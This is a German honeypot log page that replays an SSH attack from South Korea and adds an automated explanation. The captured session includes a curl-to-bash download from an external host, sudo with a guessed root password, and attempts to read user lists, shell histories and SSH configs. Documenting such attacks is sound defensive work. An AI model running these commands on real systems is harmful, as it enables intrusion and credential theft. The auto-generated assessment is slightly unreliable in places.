ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Südkorea: Schadcode nachladen und Benutzerliste auslesen

04.10.2026, 14:05 UTC · 19 Befehle · über ssh · Südkorea · 2× wiederholt

Überblick

Dienst
ssh (Port 22)
Herkunft
Südkorea · Korea Telecom
Probierte Zugangsdaten
root / ,y8g6)kZo{aDHfvY?URE
Gleiche Sitzung gesehen
2×

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ uname -a 2>/dev/null
Linux ml-node2 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 4 11:43:54 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux
root@srv01:~$ curl -sS --max-time 1 http://[IP]/da.sh 2>/dev/null | bash &
[1] 1482
root@srv01:~$ cat /etc/passwd 2>/dev/null | cut -d: -f1
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
systemd-timesync
systemd-resolve
systemd-network
systemd-bus-proxy
messagebus
sshd
admin
root@srv01:~$ printf '%s\n' ',y8g6)kZo{aDHfvY?URE' | sudo -S -p '' id 2>&1
uid=0(root) gid=0(root) groups=0(root)
root@srv01:~$ printf '%s\n' ',y8g6)kZo{aDHfvY?URE' | sudo -S -p '' bash -c '
bash: -c: line 0: unexpected EOF while looking for matching `''
root@srv01:~$ {
bash: syntax error near unexpected token `{'
root@srv01:~$ [ -n "$HISTFILE" ] && [ -r "$HISTFILE" ] && head -c 2M "$HISTFILE" 2>/dev/null
bash: /root/.bash_history: No such file or directory
root@srv01:~$ head -c 2M /root/.bash_history 2>/dev/null
bash: /root/.bash_history: No such file or directory
root@srv01:~$ head -c 2M /root/.zsh_history  2>/dev/null
head: cannot open '/root/.zsh_history' for reading: No such file or directory
root@srv01:~$ head -c 2M /root/.sh_history   2>/dev/null
head: cannot open '/root/.sh_history' for reading: No such file or directory
root@srv01:~$ for h in /home/*/.bash_history /home/*/.zsh_history /home/*/.sh_history; do
bash: syntax error near unexpected token `do'
root@srv01:~$ [ -r "$h" ] && head -c 2M "$h" 2>/dev/null
bash: syntax error near unexpected token `do'
root@srv01:~$ done
bash: syntax error near unexpected token `done'
root@srv01:~$ head -c 1M /root/.ssh/config 2>/dev/null
head: cannot open '/root/.ssh/config' for reading: No such file or directory
root@srv01:~$ for f in /home/*/.ssh/config; do
bash: syntax error near unexpected token `do'
root@srv01:~$ [ -r "$f" ] && head -c 1M "$f" 2>/dev/null
bash: syntax error near unexpected token `do'
root@srv01:~$ done
bash: syntax error near unexpected token `done'
root@srv01:~$ } 2>/dev/null
bash: syntax error near unexpected token `}'
root@srv01:~$ ' 2>/dev/null
bash: syntax error near unexpected token `2>/dev/null'

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich über SSH mit dem Benutzer root und einem erratenen Passwort an. Er führte zunächst Systeminformationen ab und versuchte, ein Skript von einem externen Server herunterzuladen und auszuführen. Anschließend sammelte er Benutzerlisten und versuchte, über sudo weitere Rechte zu erlangen, um Shell-Verläufe und SSH-Konfigurationen zu exfiltrieren.

Was die Befehle bewirken

Der Befehl uname -a ermittelt die Kernel-Version und Architektur des Systems. Der curl-Befehl lädt ein Shell-Skript von einem externen Host herunter und leitet es direkt in den bash-Interpreter, was zur sofortigen Ausführung führt. Das Kommando cat /etc/passwd listet alle lokalen Benutzerkonten auf. Der sudo-Aufruf versucht, mit dem bereits bekannten Passwort administrative Rechte zu erlangen, um geschützte Dateien zu lesen. Die nachfolgenden head-Befehle extrahieren die letzten Zeilen aus Shell-Verläufen und SSH-Konfigurationsdateien, um dort gespeicherte Passwörter oder Schlüssel zu finden.

Worauf es hinauslief

Das primäre Ziel ist die Installation einer Backdoor oder eines Botnet-Agents durch das Remote-Skript. Parallel dient die Sammlung von Shell-Verläufen und SSH-Keys der Ernte von Zugangsdaten für laterale Bewegungen im Netzwerk. Dies deutet auf einen Brückenkopf-Angriff hin, bei dem das kompromittierte System als Sprungbrett für weitere Systeme genutzt werden soll.

Einordnung

Dieses Muster ist bei automatisierten Botnetzen sehr verbreitet, die auf schwache SSH-Passwörter setzen. Die Kombination aus Remote-Code-Execution und Credential-Harvesting ist ein Standardvorgehen für moderne Linux-Malware-Familien.